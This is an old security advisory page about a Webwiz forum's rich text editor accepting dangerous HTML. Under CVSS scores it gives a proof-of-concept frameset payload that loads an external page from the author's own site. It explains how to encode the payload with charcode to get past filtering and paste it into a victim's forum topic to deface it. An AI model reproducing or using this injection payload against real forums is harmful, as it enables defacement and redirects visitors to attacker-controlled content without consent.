Webwiz vulnerable

2007.06.14
Credit: spymaster
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Webwiz vulnerable Versiyon: all versions are vulnerable Poc: it's vulnerable because of the rich text editor it accept codes which are dangerous When you hex this code with charcode it accept it and you can deface the topic anywhere using webwiz the code is this <frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0> <frame frameborder=0 src=http://www.spykod.net/js/spy.html></frameset> hex it with charcode then save it as html then make ctrl a ctrl c after it paste it to victim forum topic : ) spymaster (at) spykod (dot) net [email concealed] www.spykod.net


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top